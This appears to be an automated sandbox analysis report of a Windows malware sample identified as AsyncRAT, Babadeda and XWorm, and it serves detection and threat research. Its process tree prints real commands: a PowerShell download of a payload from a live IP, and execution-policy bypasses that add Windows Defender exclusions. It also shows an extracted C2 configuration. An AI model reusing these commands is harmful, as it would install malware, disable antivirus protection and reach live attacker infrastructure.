Edit tour
Windows
Analysis Report
da6ke5KbfB.exe
Overview
General Information
Sample name: | da6ke5KbfB.exerenamed because original name is a hash value |
Original sample name: | a091f671b517c660c7a453158d32218a.exe |
Analysis ID: | 1574852 |
MD5: | a091f671b517c660c7a453158d32218a |
SHA1: | 88e40b83e13fce6b7feb42176685767271e7ce48 |
SHA256: | 1cbfb22c0099d4c4fe32190e8f05ae5ecba336e2685e4125b62e93ba8adde55c |
Tags: | exeuser-abuse_ch |
Infos: | |
Detection
AsyncRAT, Babadeda, XWorm
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected Babadeda
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
- System is w10x64
- da6ke5KbfB.exe (PID: 5960 cmdline:
"C:\Users\ user\Deskt op\da6ke5K bfB.exe" MD5: A091F671B517C660C7A453158D32218A) - conhost.exe (PID: 5040 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 5800 cmdline:
"C:\Window s\sysnativ e\cmd" /c "C:\Users\ user\AppDa ta\Local\T emp\D64C.t mp\D64D.tm p\D64E.bat C:\Users\ user\Deskt op\da6ke5K bfB.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 5908 cmdline:
powershell -Command "Invoke-We bRequest - Uri http:/ /45.141.26 .234/x.exe -OutFile C:\Users\u ser\AppDat a\Local\Te mp\x.exe" MD5: 04029E121A0CFA5991749937DD22A1D9) - x.exe (PID: 616 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\x.exe MD5: F9A6811D7A9D5E06D73A68FC729CE66C) - powershell.exe (PID: 5828 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass Add-Mp Preference -Exclusio nPath 'C:\ Users\user \AppData\L ocal\Temp\ x.exe' MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5468 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2972 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass Add-Mp Preference -Exclusio nProcess ' x.exe' MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5692 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7060 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass Add-Mp Preference -Exclusio nPath 'C:\ ProgramDat a\Java Upd ate (32bit ).exe' MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2820 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3276 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass Add-Mp Preference -Exclusio nProcess ' Java Updat e (32bit). exe' MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1856 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
AsyncRAT | AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Babadeda | According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
XWorm | Malware with wide range of capabilities ranging from RAT to ransomware. | No Attribution |
{"C2 url": ["45.141.26.234"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security | ||
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security | ||
Click to see the 3 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security | ||
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
Click to see the 2 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security | ||
JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security | ||
JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security | ||
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
Click to see the 1 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: frack113: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-13T17:45:59.590687+0100 | 2018581 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 45.141.26.234 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-13T17:45:59.590687+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 45.141.26.234 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-13T17:47:06.575965+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
2024-12-13T17:47:11.583700+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
2024-12-13T17:47:14.102805+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
2024-12-13T17:47:16.584005+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
2024-12-13T17:47:21.606828+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
2024-12-13T17:47:25.089353+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
2024-12-13T17:47:26.602719+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
2024-12-13T17:47:30.823369+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
2024-12-13T17:47:31.606398+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
2024-12-13T17:47:36.612036+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
2024-12-13T17:47:38.854075+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
2024-12-13T17:47:41.610019+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
2024-12-13T17:47:46.607021+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
2024-12-13T17:47:49.119922+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
2024-12-13T17:47:51.602593+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
2024-12-13T17:47:56.625318+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
2024-12-13T17:48:00.819355+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
2024-12-13T17:48:01.142564+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
2024-12-13T17:48:01.643347+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
2024-12-13T17:48:04.885856+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
2024-12-13T17:48:06.660233+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-13T17:47:25.091537+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49792 | 45.141.26.234 | 7000 | TCP |
2024-12-13T17:47:49.125353+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49792 | 45.141.26.234 | 7000 | TCP |
2024-12-13T17:48:04.260859+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49792 | 45.141.26.234 | 7000 | TCP |
2024-12-13T17:48:04.886757+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49792 | 45.141.26.234 | 7000 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-13T17:47:30.823369+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
2024-12-13T17:48:00.819355+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 45.141.26.234 | 7000 | 192.168.2.5 | 49792 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-13T17:47:12.505173+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49792 | 45.141.26.234 | 7000 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: |
Source: | Avira: | ||
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: |
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: |
Source: | Static PE information: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |